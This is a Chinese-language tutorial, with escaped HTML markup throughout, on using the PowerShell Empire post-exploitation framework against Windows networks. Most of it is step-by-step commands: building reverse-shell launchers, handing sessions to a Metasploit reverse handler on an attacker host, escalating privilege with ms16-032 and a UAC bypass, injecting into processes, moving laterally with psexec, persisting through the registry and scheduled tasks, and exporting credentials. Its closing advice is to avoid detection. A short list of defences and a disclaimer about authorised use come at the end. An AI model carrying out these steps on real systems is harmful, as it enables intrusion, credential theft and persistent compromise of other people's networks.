PowerShell Empire 实战入门教程<\/h1>

一、Empire 简介<\/h2>
PowerShell Empire（简称"帝国"）是一款针对Windows系统的内网渗透工具，具有以下特点：<\/p>
无需powershell.exe即可运行PowerShell代理<\/li>
快速部署后渗透模块（按键记录、Mimikatz等）<\/li>
具备逃避网络检测的能力<\/li>
适应性强的通信机制<\/li>
类似Meterpreter的易用框架<\/li> <\/ul>
官方网站：http:\/\/powershellempire.com\/<\/p>
二、环境安装<\/h2>

系统要求<\/h3>
推荐：Debian\/Ubuntu\/Kali Linux<\/li>
不推荐：CentOS<\/li> <\/ul>
安装步骤<\/h3>
git clone https:\/\/github.com\/EmpireProject\/Empire.git
<\/span><\/span>cd Empire\/setup
<\/span><\/span>sudo .\/install.sh
<\/span><\/span><\/code><\/pre>安装过程中会提示输入服务协商密码，可直接回车使用随机生成的密码。<\/p>
三、基本使用<\/h2>
1. 监听器设置<\/h3>
查看可用监听器类型：<\/p>
(Empire: listeners) > uselistener [Tab键自动补全]
<\/code><\/pre>
共有7种监听模式。<\/p>
设置HTTP监听器示例：<\/p>
(Empire: listeners) > uselistener http
(Empire: listeners\/http) > set Name xiaobai
(Empire: listeners\/http) > set Host [服务器IP]
(Empire: listeners\/http) > execute
<\/code><\/pre>
查看激活的监听器：<\/p>
(Empire: listeners\/http) > listeners
<\/code><\/pre>
删除监听器：<\/p>
(Empire: Listeners) > kill [监听器名称]
<\/code><\/pre>
2. 生成木马程序<\/h3>
Empire提供多种木马生成模块（共26个），分为：<\/p>

multi：通用模块<\/li>
osx：Mac操作系统<\/li>
linux：Linux系统<\/li>
windows：Windows系统<\/li>
<\/ul>
生成的文件类型包括：.dll、.bat、.vbs等。<\/p>
(1) launcher模块<\/h4>
usestager [具体模块]
<\/code><\/pre>
示例（Python）：<\/p>
usestager multi\/launcher
set Listener xiaobai
execute
<\/code><\/pre>
生成的Payload是Base64编码的，可直接在目标系统执行。<\/p>
(2) vbs反弹shell<\/h4>
usestager windows\/launcher_vbs
set Listener xiaobai
execute
<\/code><\/pre>
生成的launcher.vbs文件位于\/tmp\/目录下，在目标系统执行即可获得权限。<\/p>
(3) bat文件生成<\/h4>
usestager windows\/launcher_bat
set Listener xiaobai
execute
<\/code><\/pre>
生成的launcher.bat文件执行后会快速闪过cmd窗口。<\/p>
3. 代理管理<\/h3>
查看已激活代理：<\/p>
agents
<\/code><\/pre>
注意：Username带有(*)的是已提权成功的代理。<\/p>
与代理交互：<\/p>
interact [代理名称]
<\/code><\/pre>
在代理会话中执行命令：<\/p>
shell [命令]
<\/code><\/pre>
删除代理：<\/p>

kill [代理名称]<\/code>：彻底删除<\/li>
remove [代理名称]<\/code>：仅移除（需先kill监听器）<\/li>
<\/ul>
四、模块使用<\/h2>
Empire 2.3包含204个模块，主要分类如下：<\/p>

code_execution<\/strong> - 代码执行<\/li>
collection<\/strong> - 信息收集（屏幕截图、键盘记录、剪贴板记录等）<\/li>
credentials<\/strong> - 密码凭据获取和转储<\/li>
exfiltration<\/strong> - 指定IP端口扫描<\/li>
lateral_movement<\/strong> - 横向渗透<\/li>
management<\/strong> - 系统设置和邮件信息收集<\/li>
persistence<\/strong> - 权限维持<\/li>
privesc<\/strong> - 权限提升<\/li>
recon<\/strong> - 侦察<\/li>
situational_awareness<\/strong> - 主机和网络环境评估<\/li>
trollsploit<\/strong> - 恶作剧<\/li>
<\/ol>
1. 与Metasploit联动<\/h3>
使用Empire派生meterpreter shell：<\/p>
usemodule code_execution\/invoke_shellcode
set Lport [端口]
set Lhost [MSF服务器IP]
execute
<\/code><\/pre>
MSF设置：<\/p>
use exploit\/multi\/handler
<\/span><\/span>set payload windows\/meterpreter\/reverse_https
<\/span><\/span>set Lhost [<\/span>IP]<\/span>
<\/span><\/span>set Lport [<\/span>端口]<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>2. 提权模块<\/h3>
(1) ms16-032提权<\/h4>
usemodule privesc\/ms16-032
set Listener [监听器名称]
execute
<\/code><\/pre>
(2) UAC绕过<\/h4>
usemodule privesc\/bypassuac
set Listener [监听器名称]
execute
<\/code><\/pre>
需要目标主机用户点击确认两次。<\/p>
(3) AllChecks模块<\/h4>
usemodule privesc\/powerup\/allchecks
execute
<\/code><\/pre>
检查所有可能的提权方法。<\/p>
3. 信息收集<\/h3>
(1) ARP扫描<\/h4>
usemodule situational_awareness\/network\/arpscan
set Range [IP范围，如192.168.1.0-192.168.1.254]
execute
<\/code><\/pre>
(2) 会话注入<\/h4>
usemodule management\/psinject
set ProcId [进程ID]
set Listener [监听器名称]
execute
<\/code><\/pre>
4. 横向移动<\/h3>
psexec模块<\/h4>
usemodule lateral_movement\/invoke_psexec
set ComputerName [目标IP]
set Listener [监听器名称]
execute
<\/code><\/pre>
五、权限维持<\/h2>
1. 注册表持久化<\/h3>
usemodule persistence\/elevated\/registry
set Listener [监听器名称]
execute
<\/code><\/pre>
会在注册表HKLM:SOFTWARE\Microsoft\Windows\CurrentVersion\Debug<\/code>添加启动项。<\/p>
2. 计划任务持久化<\/h3>
usemodule persistence\/elevated\/schtasks
set Listener [监听器名称]
set DailyTime [执行时间，如22:30]
execute
<\/code><\/pre>
会在任务计划程序库创建名为"Updater"的任务。<\/p>
六、实用技巧<\/h2>

查看模块信息<\/strong>：在任何模块中使用info<\/code>命令查看详细参数<\/li>
Tab补全<\/strong>：输入命令时按Tab键可自动补全<\/li>
帮助系统<\/strong>：使用help<\/code>命令查看当前上下文可用的命令<\/li>
凭证导出<\/strong>：
creds  # 查看所有hash值
creds export \/path\/to\/file.csv  # 导出凭证
<\/code><\/pre>
<\/li>
<\/ol>
七、防御建议<\/h2>

监控异常PowerShell活动<\/li>
限制PowerShell执行策略<\/li>
启用高级威胁防护<\/li>
监控注册表和计划任务异常修改<\/li>
保持系统和安全软件更新<\/li>
<\/ol>
八、总结<\/h2>
PowerShell Empire是一款功能强大的内网渗透工具，通过本文介绍的基本使用方法，可以完成从初始访问到权限维持的完整攻击链。实际使用中需要根据目标环境灵活选择模块和攻击方式，同时注意规避安全检测。<\/p>

注意：本文仅用于安全研究和防御技术学习，未经授权不得用于非法用途。<\/p>
<\/blockquote>